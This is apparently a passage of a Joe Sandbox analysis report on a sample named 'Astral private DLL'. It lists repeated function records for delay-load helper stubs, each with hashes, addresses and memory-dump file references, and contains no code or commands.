                                                                • Instruction ID: 90a47ec401361cf2e8ffb39294cff74f914af039b25c5be58ed8479ba78989b5
                                                                • Opcode Fuzzy Hash: 968f8f6a35828559ca2a58e4e55f11a01c5382974b5e87474b2127d3be036e2f
                                                                • Instruction Fuzzy Hash: 19B092A2258000BC7208A1051902E3601ECC099B10331C06EB829C10809A40A9400872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 6690b94133f4f48f1351be83fd4072a23bdeb6751660eb46a824725b7ba31a36
                                                                • Instruction ID: 31acc57c76a1f87666b7b303b9ad037d39d1edaf212a90bd6a655710c8415ebf
                                                                • Opcode Fuzzy Hash: 6690b94133f4f48f1351be83fd4072a23bdeb6751660eb46a824725b7ba31a36
                                                                • Instruction Fuzzy Hash: B2B012D1358140BC7348E2051D03E3701ECC0D8B10335C17EF82DC11C0DB40BC840872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 185aa8cd27f1a468a1ad637d1b85b43b28163d090608b4d44c81165b8b5d7451
                                                                • Instruction ID: ef8fb9e1d587d142d64d4d5a7165a85a92ad08cf9bb755eaddc6d186f4b4780f
                                                                • Opcode Fuzzy Hash: 185aa8cd27f1a468a1ad637d1b85b43b28163d090608b4d44c81165b8b5d7451
                                                                • Instruction Fuzzy Hash: F1B09291258000BC7208A2061A02E3601ECC098B10335C06EB829C11809A51A9491872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: dde2d8afda079eb39c34840af7c4c963cee533289e7905c9b4af9d011edfb0e2
                                                                • Instruction ID: b4a2fc11f0288dc11c36138b3cbd6e17f1445dc5525dad4cfbb2c30c0f298783
                                                                • Opcode Fuzzy Hash: dde2d8afda079eb39c34840af7c4c963cee533289e7905c9b4af9d011edfb0e2
                                                                • Instruction Fuzzy Hash: DCB092A1258000BC7208A1061A02E3601ECC098B10331C06EB829C1080DA41AA410872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: e4ca6cdf26c5328aaa3eae85582074900f7e53bdf5377fab701ae41437343484
                                                                • Instruction ID: db16f997f132027a75a43cc02d1704b00f0be85dbc95c2a09daea3106028c71c
                                                                • Opcode Fuzzy Hash: e4ca6cdf26c5328aaa3eae85582074900f7e53bdf5377fab701ae41437343484
                                                                • Instruction Fuzzy Hash: C8B012E1358000BC7308E1061D03E3701ECC0D8F10331C07EF82DC1080DB40BD400872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: a5de16ff9b1ff6899f9723ec152e1bf6074b083e038c4ce06a373985430fadb8
                                                                • Instruction ID: dfafd59f276737bfa552eefead7f18ce5666aa55b1bcc36f95b05ae99cb70c9e
                                                                • Opcode Fuzzy Hash: a5de16ff9b1ff6899f9723ec152e1bf6074b083e038c4ce06a373985430fadb8
                                                                • Instruction Fuzzy Hash: 73B012E1358100BC7348E1051D03E3701ECC0D8F10331C17EF82DC1080DB41BD800872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: a5627e47fc326219c8e4902fcca9dd6855b2f3b9a15477c4094bba012b104b97
                                                                • Instruction ID: a786de985aebfec7212c61eab6bcb7f58b233bde46fac15db8857c1142a07e34
                                                                • Opcode Fuzzy Hash: a5627e47fc326219c8e4902fcca9dd6855b2f3b9a15477c4094bba012b104b97
                                                                • Instruction Fuzzy Hash: 97B092A1259140BC7288A2051902E3601EDC098B10331C16EB829C10809A40A8840872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 1d279bf50607c74b79f3344999c1d92da7dda71563731841a4355618f0337d4b
                                                                • Instruction ID: 9e249f3b9f70bee42658c38dd6cae5b2822bbf08703d5af7e16cbc446d113ce5
                                                                • Opcode Fuzzy Hash: 1d279bf50607c74b79f3344999c1d92da7dda71563731841a4355618f0337d4b
                                                                • Instruction Fuzzy Hash: 85B09291299040BC7248A1051902E3601EDC099B10331C06EB829C10809A40A8400872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: c33efb10c93faf4cbbb08d94aa6b0732f1429fc419de02dc812bf6a0f1e7a430
                                                                • Instruction ID: 83e7dc91838723b86d9d425712755136da81c127187b4fae0840d6c5f9bd0760
                                                                • Opcode Fuzzy Hash: c33efb10c93faf4cbbb08d94aa6b0732f1429fc419de02dc812bf6a0f1e7a430
                                                                • Instruction Fuzzy Hash: FEB012D1369040BC7348E1051D03E3701EDC4D8F10331C07EF82EC1080DB40BC400872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 50cf86084a20ec6996416df758b58a56b0c453c61cc77079571aec26a9174c2e
                                                                • Instruction ID: 99967243378da70fd7c22b7853dc15cb1b7483213c320ed909d58844b982ecb1
                                                                • Opcode Fuzzy Hash: 50cf86084a20ec6996416df758b58a56b0c453c61cc77079571aec26a9174c2e
                                                                • Instruction Fuzzy Hash: EAB092D1258000BC7208A1151902E3601ECC099B10331C06EB829C10809B41A8400872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: fab8de34e1d990721147e36319285e0c981f3e4796ab7ad2acaf6274a95197fb
                                                                • Instruction ID: cc8e859942f0fb756f25fc221206c3c0a04b5764e0a343f30555498be37a0484
                                                                • Opcode Fuzzy Hash: fab8de34e1d990721147e36319285e0c981f3e4796ab7ad2acaf6274a95197fb
                                                                • Instruction Fuzzy Hash: F1B012E1358000BC7308E1061E03E3701ECC0D8B10331C07EF82DC1080DF42BD410872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 79b888f48fb0b9c152b7f815a989de9c484694becb85337e5a5a8d0f68e5074b
                                                                • Instruction ID: 16dc2eaa2b682ddaf1c28d73a49ca21005fec8574b207e85db25e6cd7f246988
                                                                • Opcode Fuzzy Hash: 79b888f48fb0b9c152b7f815a989de9c484694becb85337e5a5a8d0f68e5074b
                                                                • Instruction Fuzzy Hash: ADB012E22580007C330891051E02E3702FCC1D8B10330C06EF56CD11C0DB404C091473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 0f7ba96f429eaadc8006c90152b9b0ed5e525bfbed54fca27216dd6ae0f7d7b7
                                                                • Instruction ID: c2bdb68d812fe2a6aec3bf2eaeabd6c9da77b4f8d682a6d9af96255c81aba6af
                                                                • Opcode Fuzzy Hash: 0f7ba96f429eaadc8006c90152b9b0ed5e525bfbed54fca27216dd6ae0f7d7b7
                                                                • Instruction Fuzzy Hash: 9AB012F3258000BC3308E1051D02E3702FCC1D8F10330C06EF86CD1180DB408E000473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: dad42f46331709ac7303e6588bd14c5a686da94386c6271d6cd99a980e44cce3
                                                                • Instruction ID: 24b7702f2b9a0befa6cd9f656752c5e36f611fb844e5630857d622a559bf4100
                                                                • Opcode Fuzzy Hash: dad42f46331709ac7303e6588bd14c5a686da94386c6271d6cd99a980e44cce3
                                                                • Instruction Fuzzy Hash: F0B012E2258000BC3308E1051D02E3702FCC1D8B10330C06FF86CD11C0DB408C040473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: b863a71e3e7deac2e468279a2e7d8476cf29a4120ff9e5722296e29083a8181a
                                                                • Instruction ID: 5384d2f57a466b0a84db0f2e18ca3250c414bce66e7ec458764ad5989db61636
                                                                • Opcode Fuzzy Hash: b863a71e3e7deac2e468279a2e7d8476cf29a4120ff9e5722296e29083a8181a
                                                                • Instruction Fuzzy Hash: 4AB012C62581407C330811241E06E3B02FCC0D5F10330C07EF478D0481AB418D040472
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 0d8a416664e232c4619bf7147c16bb79d1a0aa05477e07f698372c2ea5271d9f
                                                                • Instruction ID: a11ae346a2c66588f100e43c7dbeb8cd6f1463f77c02245ddb8283061c77061f
                                                                • Opcode Fuzzy Hash: 0d8a416664e232c4619bf7147c16bb79d1a0aa05477e07f698372c2ea5271d9f
                                                                • Instruction Fuzzy Hash: 34B012C62580007D330851081E02F3B02FCC0D9F10330C06EF42CC0180EB408C000473
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
